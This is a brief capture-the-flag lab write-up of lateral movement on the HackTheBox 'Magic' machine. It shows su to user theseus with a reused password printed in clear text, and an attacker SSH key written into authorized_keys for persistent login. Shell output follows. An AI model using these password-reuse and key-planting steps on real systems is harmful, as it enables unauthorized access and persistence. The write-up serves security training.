InfoSec LAB

Magic_Lateral_Movement_theseus

Created: 2 min read

theseus

Checking for password reuse of the web credential

Since the SSH configuration of the target system does not allow password authentication, I would need to test password reuse by switching to the theseus user from within the system

www-data@ubuntu:/dev/shm$ su theseus
password: Th3s3usW4sK1ng
 
theseus@ubuntu:/dev/shm$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

Password reuse confirmed for the theseus user

theseus@ubuntu:/dev/shm$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys

SSH Key write

┌──(kali㉿kali)-[~/archive/htb/labs/magic]
└─$ ssh theseus@$IP -i ~/.ssh/id_ed25519
enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
 
 * Canonical Livepatch is available for installation.
   - reduce system reboots and improve kernel security. activate at:
     https://ubuntu.com/livepatch
 
407 packages can be updated.
305 updates are security updates.
 
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Your Hardware Enablement Stack (HWE) is supported until April 2023.
theseus@ubuntu:~$ whoami
theseus
theseus@ubuntu:~$ hostname
ubuntu
theseus@ubuntu:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.185  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:77ae  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:77ae  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:77:ae  txqueuelen 1000  (Ethernet)
        RX packets 190682  bytes 24126656 (24.1 MB)
        RX errors 0  dropped 35  overruns 0  frame 0
        TX packets 182600  bytes 53381022 (53.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 15669  bytes 1227713 (1.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15669  bytes 1227713 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement made to the theseus user via SSH

Interactive Graph View

Backlinks